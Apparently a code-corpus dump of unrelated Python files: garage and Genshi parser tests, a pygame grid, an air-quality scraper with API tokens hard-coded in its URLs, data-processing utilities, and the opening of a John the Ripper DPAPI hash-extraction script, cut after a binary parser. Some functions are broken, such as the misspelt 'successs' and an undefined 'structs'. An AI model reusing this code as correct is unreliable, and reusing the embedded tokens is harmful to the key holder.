def test_standard_cars_are_rejected_from_compact_parking_space():
parking_level_1 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
parking_level_2 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
parking_level_3 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
garage = Garage(levels=[parking_level_1, parking_level_2, parking_level_3])
vehicle_1 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_2 = Vehicle(vehicle_type=VehicleType.Car)
vehicle_3 = Vehicle(vehicle_type=VehicleType.Car)
vehicle_4 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_5 = Vehicle(vehicle_type=VehicleType.Car)
vehicle_6 = Vehicle(vehicle_type=VehicleType.Car)
expected_rejected_vehicles: List[Vehicle] = [
vehicle_2,
vehicle_3,
vehicle_5,
vehicle_6,
]
actual_rejected_vehicles = garage.add_vehicles(
[vehicle_1, vehicle_2, vehicle_3, vehicle_4, vehicle_5, vehicle_6]
)
TestHelpers.assert_expected_vehicles_are_rejected(
actual=actual_rejected_vehicles, expected=expected_rejected_vehicles
)
def test_trucks_are_rejected_from_compact_parking_space():
parking_level_1 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
parking_level_2 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
parking_level_3 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
garage = Garage(levels=[parking_level_1, parking_level_2, parking_level_3])
vehicle_1 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_2 = Vehicle(vehicle_type=VehicleType.Truck)
vehicle_3 = Vehicle(vehicle_type=VehicleType.Truck)
vehicle_4 = Vehicle(vehicle_type=VehicleType.Truck)
vehicle_5 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_6 = Vehicle(vehicle_type=VehicleType.Truck)
expected_rejected_vehicles: List[Vehicle] = [
vehicle_2,
vehicle_3,
vehicle_4,
vehicle_6,
]
actual_rejected_vehicles = garage.add_vehicles(
[vehicle_1, vehicle_2, vehicle_3, vehicle_4, vehicle_5, vehicle_6]
)
TestHelpers.assert_expected_vehicles_are_rejected(
actual=actual_rejected_vehicles, expected=expected_rejected_vehicles
)
def test_compact_vehicles_are_first_prioritized_into_compact_parking_space():
parking_level_1 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=False)]
)
parking_level_2 = ParkingLevel(
spaces=[ParkingSpace(compact=False), ParkingSpace(compact=True)]
)
parking_level_3 = ParkingLevel(
spaces=[ParkingSpace(compact=False), ParkingSpace(compact=False)]
)
garage = Garage(levels=[parking_level_1, parking_level_2, parking_level_3])
vehicle_1 = Vehicle(vehicle_type=VehicleType.Car)
vehicle_2 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_3 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_4 = Vehicle(vehicle_type=VehicleType.Truck)
vehicle_5 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_6 = Vehicle(vehicle_type=VehicleType.Car)
expected_vehicles_on_level_1: List[Vehicle] = [vehicle_2, vehicle_1]
expected_vehicles_on_level_2: List[Vehicle] = [vehicle_4, vehicle_3]
expected_vehicles_on_level_3: List[Vehicle] = [vehicle_5, vehicle_6]
garage.add_vehicles(
[vehicle_1, vehicle_2, vehicle_3, vehicle_4, vehicle_5, vehicle_6]
)
TestHelpers.assert_expected_parking_placement(
levels=garage.levels,
expected_levels=[
expected_vehicles_on_level_1,
expected_vehicles_on_level_2,
expected_vehicles_on_level_3,
],
)
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://genshi.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://genshi.edgewall.org/log/.
import doctest
import sys
import unittest
from genshi.core import Attrs, Stream
from genshi.input import XMLParser, HTMLParser, ParseError
from genshi.compat import StringIO, BytesIO
class XMLParserTestCase(unittest.TestCase):
def test_text_node_pos_single_line(self):
text = '<elem>foo bar</elem>'
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('foo bar', data)
self.assertEqual((None, 1, 6), pos)
def test_text_node_pos_multi_line(self):
text = '''<elem>foo
bar</elem>'''
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('foo\nbar', data)
self.assertEqual((None, 1, -1), pos)
def test_element_attribute_order(self):
text = '<elem title="baz" id="foo" class="bar" />'
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[0]
self.assertEqual(Stream.START, kind)
tag, attrib = data
self.assertEqual('elem', tag)
self.assertEqual(('title', 'baz'), attrib[0])
self.assertEqual(('id', 'foo'), attrib[1])
self.assertEqual(('class', 'bar'), attrib[2])
def test_unicode_input(self):
text = '<div>\u2013</div>'
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\u2013', data)
def test_latin1_encoded(self):
text = '<div>\xf6</div>'.encode('iso-8859-1')
events = list(XMLParser(BytesIO(text), encoding='iso-8859-1'))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xf6', data)
def test_latin1_encoded_xmldecl(self):
text = """<?xml version="1.0" encoding="iso-8859-1" ?>
<div>\xf6</div>
""".encode('iso-8859-1')
events = list(XMLParser(BytesIO(text)))
kind, data, pos = events[2]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xf6', data)
def test_html_entity_with_dtd(self):
text = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> </html>
"""
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[2]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xa0', data)
def test_html_entity_without_dtd(self):
text = '<html> </html>'
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xa0', data)
def test_html_entity_in_attribute(self):
text = '<p title=" "/>'
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[0]
self.assertEqual(Stream.START, kind)
self.assertEqual('\xa0', data[1].get('title'))
kind, data, pos = events[1]
self.assertEqual(Stream.END, kind)
def test_undefined_entity_with_dtd(self):
text = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>&junk;</html>
"""
events = XMLParser(StringIO(text))
self.assertRaises(ParseError, list, events)
def test_undefined_entity_without_dtd(self):
text = '<html>&junk;</html>'
events = XMLParser(StringIO(text))
self.assertRaises(ParseError, list, events)
class HTMLParserTestCase(unittest.TestCase):
def test_text_node_pos_single_line(self):
text = '<elem>foo bar</elem>'
events = list(HTMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('foo bar', data)
self.assertEqual((None, 1, 6), pos)
def test_text_node_pos_multi_line(self):
text = '''<elem>foo
bar</elem>'''
events = list(HTMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('foo\nbar', data)
self.assertEqual((None, 1, 6), pos)
def test_input_encoding_text(self):
text = '<div>\xf6</div>'.encode('iso-8859-1')
events = list(HTMLParser(BytesIO(text), encoding='iso-8859-1'))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xf6', data)
def test_input_encoding_attribute(self):
text = '<div title="\xf6"></div>'.encode('iso-8859-1')
events = list(HTMLParser(BytesIO(text), encoding='iso-8859-1'))
kind, (tag, attrib), pos = events[0]
self.assertEqual(Stream.START, kind)
self.assertEqual('\xf6', attrib.get('title'))
def test_unicode_input(self):
text = '<div>\u2013</div>'
events = list(HTMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\u2013', data)
def test_html_entity_in_attribute(self):
text = '<p title=" "></p>'
events = list(HTMLParser(StringIO(text)))
kind, data, pos = events[0]
self.assertEqual(Stream.START, kind)
self.assertEqual('\xa0', data[1].get('title'))
kind, data, pos = events[1]
self.assertEqual(Stream.END, kind)
def test_html_entity_in_text(self):
text = '<p> </p>'
events = list(HTMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xa0', data)
def test_processing_instruction(self):
text = '<?php echo "Foobar" ?>'
events = list(HTMLParser(StringIO(text)))
kind, (target, data), pos = events[0]
self.assertEqual(Stream.PI, kind)
self.assertEqual('php', target)
self.assertEqual('echo "Foobar"', data)
def test_processing_instruction_no_data_1(self):
text = '<?foo ?>'
events = list(HTMLParser(StringIO(text)))
kind, (target, data), pos = events[0]
self.assertEqual(Stream.PI, kind)
self.assertEqual('foo', target)
self.assertEqual('', data)
def test_processing_instruction_no_data_2(self):
text = '<?experiment>...<?/experiment>'
events = list(HTMLParser(StringIO(text)))
kind, (target, data), pos = events[0]
self.assertEqual(Stream.PI, kind)
self.assertEqual('experiment', target)
self.assertEqual('', data)
kind, (target, data), pos = events[2]
self.assertEqual('/experiment', target)
self.assertEqual('', data)
def test_xmldecl(self):
text = '<?xml version="1.0" ?><root />'
events = list(XMLParser(StringIO(text)))
kind, (version, encoding, standalone), pos = events[0]
self.assertEqual(Stream.XML_DECL, kind)
self.assertEqual('1.0', version)
self.assertEqual(None, encoding)
self.assertEqual(-1, standalone)
def test_xmldecl_encoding(self):
text = '<?xml version="1.0" encoding="utf-8" ?><root />'
events = list(XMLParser(StringIO(text)))
kind, (version, encoding, standalone), pos = events[0]
self.assertEqual(Stream.XML_DECL, kind)
self.assertEqual('1.0', version)
self.assertEqual('utf-8', encoding)
self.assertEqual(-1, standalone)
def test_xmldecl_standalone(self):
text = '<?xml version="1.0" standalone="yes" ?><root />'
events = list(XMLParser(StringIO(text)))
kind, (version, encoding, standalone), pos = events[0]
self.assertEqual(Stream.XML_DECL, kind)
self.assertEqual('1.0', version)
self.assertEqual(None, encoding)
self.assertEqual(1, standalone)
def test_processing_instruction_trailing_qmark(self):
text = '<?php echo "Foobar" ??>'
events = list(HTMLParser(StringIO(text)))
kind, (target, data), pos = events[0]
self.assertEqual(Stream.PI, kind)
self.assertEqual('php', target)
self.assertEqual('echo "Foobar" ?', data)
def test_out_of_order_tags1(self):
text = '<span><b>Foobar</span></b>'
events = list(HTMLParser(StringIO(text)))
self.assertEqual(5, len(events))
self.assertEqual((Stream.START, ('span', ())), events[0][:2])
self.assertEqual((Stream.START, ('b', ())), events[1][:2])
self.assertEqual((Stream.TEXT, 'Foobar'), events[2][:2])
self.assertEqual((Stream.END, 'b'), events[3][:2])
self.assertEqual((Stream.END, 'span'), events[4][:2])
def test_out_of_order_tags2(self):
text = '<span class="baz"><b><i>Foobar</span></b></i>'.encode('utf-8')
events = list(HTMLParser(BytesIO(text), encoding='utf-8'))
self.assertEqual(7, len(events))
self.assertEqual((Stream.START, ('span', Attrs([('class', 'baz')]))),
events[0][:2])
self.assertEqual((Stream.START, ('b', ())), events[1][:2])
self.assertEqual((Stream.START, ('i', ())), events[2][:2])
self.assertEqual((Stream.TEXT, 'Foobar'), events[3][:2])
self.assertEqual((Stream.END, 'i'), events[4][:2])
self.assertEqual((Stream.END, 'b'), events[5][:2])
self.assertEqual((Stream.END, 'span'), events[6][:2])
def test_out_of_order_tags3(self):
text = '<span><b>Foobar</i>'.encode('utf-8')
events = list(HTMLParser(BytesIO(text), encoding='utf-8'))
self.assertEqual(5, len(events))
self.assertEqual((Stream.START, ('span', ())), events[0][:2])
self.assertEqual((Stream.START, ('b', ())), events[1][:2])
self.assertEqual((Stream.TEXT, 'Foobar'), events[2][:2])
self.assertEqual((Stream.END, 'b'), events[3][:2])
self.assertEqual((Stream.END, 'span'), events[4][:2])
def test_hex_charref(self):
text = '<span>'</span>'
events = list(HTMLParser(StringIO(text)))
self.assertEqual(3, len(events))
self.assertEqual((Stream.START, ('span', ())), events[0][:2])
self.assertEqual((Stream.TEXT, "'"), events[1][:2])
self.assertEqual((Stream.END, 'span'), events[2][:2])
def test_multibyte_character_on_chunk_boundary(self):
text = 'a' * ((4 * 1024) - 1) + '\xe6'
events = list(HTMLParser(BytesIO(text.encode('utf-8')),
encoding='utf-8'))
self.assertEqual(1, len(events))
self.assertEqual((Stream.TEXT, text), events[0][:2])
def suite():
suite = unittest.TestSuite()
suite.addTest(doctest.DocTestSuite(XMLParser.__module__))
suite.addTest(unittest.makeSuite(XMLParserTestCase, 'test'))
suite.addTest(unittest.makeSuite(HTMLParserTestCase, 'test'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
from pygame import Rect
class Grid:
@classmethod
def init(cls):
return cls((0, 0), (1, 1), (1, 1))
def __init__(self, position, size, slice, gap=(0, 0)):
self.slice = slice
self.size = size
self.gap = gap
self.position = position
self.update()
def calculate_cut(self):
x = self.slice[0] + self.gap[0]
y = self.slice[1] + self.gap[1]
return x, y
def calculate_rect(self, position):
width = self.size[0] * self.cut[0]
height = self.size[1] * self.cut[1]
return Rect(position, (width, height))
def get_rect(self, location):
return Rect(
location[0] * self.cut[0] + self.rect.x,
location[1] * self.cut[1] + self.rect.y,
self.slice[0],
self.slice[1])
def get_location(self, mouse_position):
mx, my = mouse_position
x = int((mx - self.rect.x) / self.cut[0])
y = int((my - self.rect.y) / self.cut[1])
if not self.location_within(x, y):
return
if self.get_rect((x, y)).collidepoint(mx, my):
return x, y
return
def location_within(self, x, y):
sx, sy = self.size
if 0 <= x < sx:
if 0 <= y < sy:
return True
return False
def update(self):
self.cut = self.calculate_cut()
self.rect = self.calculate_rect(self.position)
|
from translathor import translator
from apicalls import *
def caller():
intention = input(
"To get songs by an artist use (F)\nTo get music lyrics use(G)\nUse (H) to get lyrics and translate -->")
if intention.lower() not in ['f', 'g', 'h'] :
exit("Lmao, get serious abeg")
elif intention.lower() == "g":
for text in get_lyrics():
print(text)
elif intention.lower() == "f":
get_songsby()
else:
print(translator(get_lyrics()))
if __name__ == "__main__":
print(caller())
|
import csv
import time
import json
import requests
import numpy as np
import gevent.monkey
import urllib
from datetime import datetime
from urllib.request import urlopen
start_time = time.time()
header_row = False
count = 0
file_name = "dust_result_" + time.strftime("%Y%m%d-%H%M%S") + ".csv"
# urls = ['https://api.waqi.info/mapq/bounds/?bounds=26.748288,97.037243,50.571187,1153.902477&inc=placeholders&k=_2Y2EzVBxYGVgdIzsJSBRWXmldaA09PSNWFXgZZQ==&_=1491802275939']
xmax = 153
xmin = 97
ymax = 46
ymin = 22
# x_list = np.linspace(xmin,xmax,10)
# y_list = np.linspace(ymin,ymax,10)
x_list = np.arange(xmin,xmax,2)
y_list = np.arange(ymin,ymax,2)
urls = []
for x_idx, x in enumerate(x_list):
for y_idx, y in enumerate(y_list):
if x_idx > 0 and y_idx > 0:
urls.append('https://api.waqi.info/mapq/bounds/?bounds='+ str(y_list[y_idx-1]) + ',' + str(x_list[x_idx-1]) + ',' + str(y) + ',' + str(x) +'&inc=placeholders&k=_2Y2EzVBxmFRAdIyNNSzJWXmldaAw9AzdWFlY7IA==&_=1492570231356')
# print(x)
# print(y)
print(len(urls))
def print_head(url):
global header_row
# print('Starting {}'.format(url))
data = urlopen(url).read().decode('utf8')
resultstr = json.loads(data)
print("length:", str(len(resultstr)))
with open(file_name, "a", encoding='utf-8') as outcsv:
dict_writer = csv.DictWriter(outcsv,
fieldnames=["lat", "lon", "city", "idx", "stamp", "pol", "x", "aqi", "tz",
"utime", "img"], delimiter=',', lineterminator='\n')
if header_row == False:
dict_writer.writeheader()
header_row = True
dict_writer.writerows(resultstr)
print("--- %s seconds ---" % (time.time() - start_time))
jobs = [gevent.spawn(print_head, _url) for _url in urls]
gevent.wait(jobs)
|
import glob
import numpy as np
import os
import tensorflow as tf
import tqdm
import random
def data_paths(path):
paths = []
if os.path.isfile(path):
# Simple file
paths.append(path)
elif os.path.isdir(path):
# Directory
for (dirpath, _, fnames) in os.walk(path):
for fname in fnames:
paths.append(os.path.join(dirpath, fname))
else:
# Assume glob
paths = glob.glob(path)
return paths
def load_dataset(enc, paths, combine):
token_chunks = []
indices = []
raw_text = ''
i = 0
for path in tqdm.tqdm(paths, disable=len(paths) == 1):
indices.append([])
if path.endswith('.npz'):
# Pre-encoded
with np.load(path) as npz:
indices[-1].append(i)
for item in npz.files:
token_chunks.append(npz[item])
i += 1
indices[-1].append(i - 1)
else:
# Plain text
indices[-1].append(i)
with open(path, 'r') as fp:
raw_text += fp.read()
if len(raw_text) >= combine:
tokens = np.stack(enc.encode(raw_text))
token_chunks.append(tokens)
i += 1
raw_text = ''
else:
raw_text += '<|endoftext|>'
indices[-1].append(i - 1)
if raw_text:
tokens = np.stack(enc.encode(raw_text))
token_chunks.append(tokens)
indices[-1].append(i)
i += 1
return token_chunks, indices
def binary_search(f, lo, hi):
if f(lo) or not f(hi):
return None
while hi > lo + 1:
mid = (lo + hi) // 2
if f(mid):
hi = mid
else:
lo = mid
return hi
class Sampler(object):
"""Fairly samples a slice from a set of variable sized chunks.
'Fairly' means that the distribution is the same as sampling from one concatenated chunk,
but without crossing chunk boundaries."""
def __init__(self, enc, combine, path, perm_path, num_simultaneous_files=5, seed=None, dataset_loader=load_dataset, arr_paths=False, shuffle=True):
self.load_dataset = dataset_loader
self.enc = enc
self.combine = combine
print('Loading perma dataset')
if perm_path is None:
self.permchunks = []
else:
self.permchunks, _ = self.load_dataset(enc, perm_path if arr_paths else data_paths(perm_path), combine)
self.num_simultaneous_files = num_simultaneous_files
print('Loading cycling dataset')
if path is None:
self.paths = []
else:
self.paths = path if arr_paths else data_paths(path)
self.seed = seed
if shuffle:
random.shuffle(self.paths)
self.chunks, self.chunkindices = self.load_dataset(enc, self.paths[:num_simultaneous_files], combine)
self.cycleindex = 0
print('Paths loaded:', self.paths[:num_simultaneous_files])
self.set_chunks(self.chunks)
def set_chunks(self, chunks):
chunks.extend(self.permchunks)
self.chunks = chunks
self.total_size = sum(chunk.shape[0] for chunk in chunks)
self.boundaries = [0]
for i in range(len(chunks)):
self.boundaries.append(self.boundaries[-1] + chunks[i].shape[0])
self.rs = np.random.RandomState(seed=self.seed)
def cycle_files(self):
if len(self.paths) - len(self.chunkindices) == 0 or self.num_simultaneous_files == 0:
# can't cycle :(
return
self.chunks = self.chunks[:self.chunkindices[-1][-1] + 1]
# assert self.chunkindices[0][0] == 0
# unload first file
del self.chunks[:self.chunkindices[0][-1] + 1]
del self.chunkindices[0]
# shift indices
newdelta = self.chunkindices[0][0]
self.chunkindices = [[y - newdelta for y in x] for x in self.chunkindices]
# assert self.chunkindices[0][0] == 0
# assert len(self.chunkindices) == 1 or self.chunkindices[1][0] == self.chunkindices[0][-1] + 1
# print('Unloaded file {}'.format(self.paths[self.cycleindex]))
sidx = self.cycleindex + len(self.chunkindices) + 1
sidx %= len(self.paths)
# print('Loading file {}'.format(self.paths[sidx]))
nc, ncis = self.load_dataset(self.enc, [self.paths[sidx]], self.combine)
self.chunks.extend(nc)
self.chunkindices.extend([[y + self.chunkindices[-1][-1] + 1 for y in x] for x in ncis])
self.cycleindex += 1
self.cycleindex %= len(self.paths)
self.set_chunks(self.chunks)
def sample(self, length):
assert length < self.total_size // len(
self.chunks
), "Dataset files are too small to sample {} tokens at a time".format(
length)
while True:
index = self.rs.randint(0, self.total_size - length - 1)
i = binary_search(lambda j: self.boundaries[j] > index, 0,
len(self.boundaries) - 1) - 1
if self.boundaries[i + 1] > index + length:
within_chunk = index - self.boundaries[i]
return self.chunks[i][within_chunk:within_chunk + length]
|
from django.urls import path
from django.conf.urls import url
from django.urls import include
from api import views
urlpatterns = [
path('types/', include('api.types.urls')),
path('experiments/', include('api.experiments.urls')),
path('samples/', include('api.samples.urls')),
path('persons/', include('api.persons.urls')),
path('vfs/', include('api.vfs.urls')),
path('download/', include('api.download.urls')),
path('seq/', include('api.seq.urls')),
path('ucsc/', include('api.ucsc.urls')),
path('genomic/', include('api.genomic.urls')),
path('groups/', include('api.groups.urls')),
path('account/', include('api.account.urls')),
path('admin/', include('api.admin.urls')),
path('about', views.about, name='about'),
path('test', views.test, name='test')
]
|
# Required libraries
import pandas as pd
import logging as log
import time
import numpy as np
from scipy import signal
from sklearn.feature_extraction.text import CountVectorizer
# Given an iterable (list or Series), turns it into a bag of words matrix (DataFrame)
def get_bow(iterable, vocabulary=None, prefix=''):
# Turn vocabulary words lowercase, as required by CountVectorizer
if vocabulary:
vocabulary = [v.lower() for v in vocabulary]
# Apply CountVectorizer with given vocabulary
cv = CountVectorizer(vocabulary=vocabulary)
# Compute BOW matrix
bow = pd.DataFrame(cv.fit_transform(iterable).toarray(), columns=['{}{}'.format(prefix, f.upper()) for f in cv.get_feature_names()])
# Return computed bag of words
return bow
def get_bow_residues(residues, vocabulary=None, prefix='RES_NAME_'):
return get_bow(structs, vocabulary, prefix)
def get_bow_structures(structs, vocabulary=None, prefix='STRUCT_'):
return get_bow(structs, vocabulary, prefix)
def get_bow_edge_loc(structs, vocabulary=None, prefix='EDGE_LOC_'):
return get_bow(structs, vocabulary, prefix)
def get_bow_edge_type(structs, vocabulary=None, prefix='EDGE_TYPE'):
return get_bow(structs, vocabulary, prefix)
# Given a DataFrame and a column, removes the column and adds BOW columns computed from the latter
def replace_bow(df, col, vocabulary=None, prefix='', drop=False):
# Retrieve column which will be removed
removed = df[col]
# Delete column from dataframe if requested
if drop:
df = df.drop(col, axis=1, inplace=False)
# Compute BOW
bow = get_bow(removed, vocabulary=vocabulary, prefix=prefix)
# Concatenate DataFrames
df = pd.concat([df, bow], axis=1)
# Return computed DataFrame
return df
"""
Function to apply sliding windows on a proteins dataset. It uses Gaussian Filtering
"""
def sliding_window(data, k, sd):
"""
REQUIRE:
import pandas as pd
import numpy as np
import signal from scipy
INPUT:
data = dataframe of main features
k = the size of a window (int)
sd = the standard deviation of the gaussian filter (float)
OUTPUT:
A dataframe with sliding windows applied
"""
# Define starting time of the function
start = time.time()
#Set variables
df_windows = data.copy()
#Cycle for every protein
for pdb_id in data.PDB_ID.unique():
#Cycle for every chain in a given protein
for chain in set(data.CHAIN_ID[data.PDB_ID == pdb_id].unique()):
#Work on a reduced dataset: we apply sliding windows for every chain
df_sliced = df_windows[(data.PDB_ID == pdb_id)
& (data.CHAIN_ID == chain)]
# SET PDB_ID, CHIAN_ID and RES_ID to a separated df, we are not going to apply gaussian filter on them
info_sliced = df_sliced.iloc[:, 0:3]
#Shortcut name for lengths
chain_len = len(data.CHAIN_ID[(data.PDB_ID == pdb_id)
& (data.CHAIN_ID == chain)])
#Apply a symmatric mirroring at the start of the chain of size k//2
df_windows_start = pd.DataFrame(np.array(df_sliced.iloc[1:(k//2+1), ]),
index=np.arange(-k//2 + 1, 0, step = 1),
columns=list(data.columns)).sort_index()
#Apply a symmatric mirroring at the end of the chain of k//2
df_windows_end = pd.DataFrame(np.array(df_sliced.iloc[chain_len-(k//2 + 1):chain_len-1, ]),
index=np.arange(chain_len-1 + k//2,chain_len-1, step = -1),
columns=list(data.columns)).sort_index()
#Now we merge reunite this dataframe
df_with_start_sym = df_windows_start.append(df_sliced)
df_win_k = df_with_start_sym.append(df_windows_end)
### MAIN: COMPUTE GAUSSIAN FILTER OF GIVEN DATAFRAME
sliced = df_win_k.iloc[:, 3:]
window = signal.gaussian(k, std = sd)
sliced = sliced.rolling(window = k, center = True).apply(lambda x: np.dot(x,window)/k, raw=True)
# Reunite filtered features with PDB_ID, CHAIN_ID, RES_ID
tot_sliced = pd.merge(info_sliced, sliced.iloc[0:chain_len+k//2,:],
right_index=True, left_index=True) #here is chain_len + k//2
### Update the dataframe with the filtered features of given chain
df_windows[(df_windows.PDB_ID == pdb_id) & (df_windows.CHAIN_ID == chain)] = tot_sliced
# Debug time
log.debug('Window sliding took {}'.format(time.time() - start))
# Return "window slided" dataframe
return df_windows
|
import warnings
import numpy as np
__all__ = [
'recarray_to_colmajor']
from pnumpy._pnumpy import recarray_to_colmajor as _recarray_to_colmajor
#-----------------------------------------------------------------------------------------
def recarray_to_colmajor(item, parallel=True):
"""
Converts a numpy record array (void type) to a dictionary of numpy arrays, col major
Returns
-------
A dictionary of numpy arrays corresponding to the original numpy record array.
Examples
--------
>>> x=np.array([(1.0, 2, 3, 4, 5, 'this is a long test'), (3.0, 4, 5, 6, 7, 'short'), (30.0, 40, 50, 60, 70, '')],
dtype=[('x', '<f4'), ('y', '<i2'), ('z', 'i8'),('zz','i8'),('yy','i4'),('str','<S20')])
>>> item=np.tile(x,100_000)
>>> mydict = recarray_to_colmajor(item)
"""
if item.dtype.char == 'V':
# warnings.warn(f"Converting numpy record array. Performance may suffer.")
# flip row-major to column-major
list_types = [*item.dtype.fields.values()]
success = True
for t in list_types:
val = t[0].char
# if the record type has an object or another record type, we cannot handle
if val == 'O' or val =='V':
success = False
break;
d={}
if successs and parallel:
offsets=[]
arrays=np.empty(len(item.dtype.fields), dtype='O')
arrlen = len(item)
count =0
for name, v in item.dtype.fields.items():
offsets.append(v[1])
arr= np.empty(arrlen, dtype=v[0])
arrays[count] = arr
count += 1
# build dict of names and new arrays
d[name] = arr
# Call parallel routine to convert
_recarray_to_colmajor(item, np.asarray(offsets, dtype=np.int64), arrays);
else:
# single thread way
for name in item.dtype.names:
d[name] = item[:][name].copy()
return d
warnings.warn(f"The array passed was not a numpy record array.")
return item
|
__author__ = 'Neil Butcher'
import CheckingAlgorithms
def priority(a):
return a.priority
def CheckDuration(duration, population):
events = duration.events
appointments = duration.appointments()
result = []
result.extend(CheckingAlgorithms.MissingPersonCheck(appointments, population))
result.extend(CheckingAlgorithms.UnqualifiedPersonCheck(appointments))
result.extend(CheckingAlgorithms.BlacklistedDatePersonCheck(appointments))
result.extend(CheckingAlgorithms.MultitaskingPersonCheck(events, 2))
result.extend(CheckingAlgorithms.IncompatibleMultitaskingPersonCheck(events))
result.extend(CheckingAlgorithms.MultipleOneDayAppointmentsPersonCheck(appointments, population))
result.extend(CheckingAlgorithms.MultipleOneWeekAppointmentsPersonCheck(appointments, population))
result.extend(CheckingAlgorithms.UnfilledAppointmentCheck(events))
result.extend(CheckingAlgorithms.OverloadedPersonCheck(appointments, ratioLimit=0.3))
result.extend(CheckingAlgorithms.OverloadedOneRolePersonCheck(appointments, ratioLimit=0.3))
result.extend(CheckingAlgorithms.UnderusedPersonCheck(population, appointments))
result.extend(CheckingAlgorithms.UnderusedOneRolePersonCheck(population, appointments))
return sorted(result, key=priority, reverse=True)
|
"""Games package."""
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Modified (for JtR) by Dhiru Kholia in December, 2014.
# Modified (for JtR) by Jean-Christophe Delaunay
# <jean-christophe.delaunay at synacktiv.com> in 2017
# to support further options and JtR new hash format
#
# This file is part of DPAPIck
# Windows DPAPI decryption & forensic toolkit
#
# Copyright (C) 2010, 2011 Cassidian SAS. All rights reserved.
# This document is the property of Cassidian SAS, it may not be copied or
# circulated without prior licence
#
# Author: Jean-Michel Picod <[email protected]>
#
# This program is distributed under GPLv3 licence (see LICENCE.txt)
import sys
import struct
import array
import hmac
import hashlib
import binascii
try:
from Crypto.Cipher import AES
from Crypto.Cipher import DES
from Crypto.Cipher import DES3
except ImportError:
sys.stderr.write("For additional functionality, please install PyCrypto package.\n")
import argparse
from collections import defaultdict
debug = False
class Eater(object):
"""This class is a helper for parsing binary structures."""
def __init__(self, raw, offset=0, end=None, endianness="<"):
self.raw = raw
self.ofs = offset
if end is None:
end = len(raw)
self.end = end
self.endianness = endianness
def prepare_fmt(self, fmt):
"""Internal use. Prepend endianness to the given format if it is not
already specified.
fmt is a format string for struct.unpack()
Returns a tuple of the format string and the corresponding data size.
"""
if fmt[0] not in ("<", ">", "!", "@"):
fmt = self.endianness + fmt
return fmt, struct.calcsize(fmt)
def read(self, fmt):
"""Parses data with the given format string without taking away bytes.
Returns an array of elements or just one element depending on fmt.
"""
fmt, sz = self.prepare_fmt(fmt)
v = struct.unpack_from(fmt, self.raw, self.ofs)
if len(v) == 1:
v = v[0]
return v
def eat(self, fmt):
"""Parses data with the given format string.
Returns an array of elements or just one element depending on fmt.
"""
fmt, sz = self.prepare_fmt(fmt)
v = struct.unpack_from(fmt, self.raw, self.ofs)
if len(v) == 1:
v = v[0]
self.ofs += sz
return v
def eat_string(self, length):
"""Eats and returns a string of length characters"""
return self.eat("%us" % length)
def eat_length_and_string(self, fmt):
"""Eats and returns a string which length is obtained after eating
an integer represented by fmt
"""
l = self.eat(fmt)
return self.eat_string(l)
def pop(self, fmt):
"""Eats a structure represented by fmt from the end of raw data"""
fmt, sz = self.prepare_fmt(fmt)
self.end -= sz
v = struct.unpack_from(fmt, self.raw, self.end)
if len(v) == 1:
v = v[0]
return v
def pop_string(self, length):
"""Pops and returns a string of length characters"""
return self.pop("%us" % length)
def pop_length_and_string(self, fmt):
"""Pops and returns a string which length is obtained after poping an
integer represented by fmt.
"""
l = self.pop(fmt)
return self.pop_string(l)
def remain(self):
"""Returns all the bytes that have not been eated nor poped yet."""
return self.raw[self.ofs:self.end]
def eat_sub(self, length):
"""Eats a sub-structure that is contained in the next length bytes"""
sub = self.__class__(self.raw[self.ofs:self.ofs+length], endianness=self.endianness)
self.ofs += length
return sub
def __nonzero__(self):
return self.ofs < self.end
class DataStruct(object):
"""Don't use this class unless you know what you are doing!"""
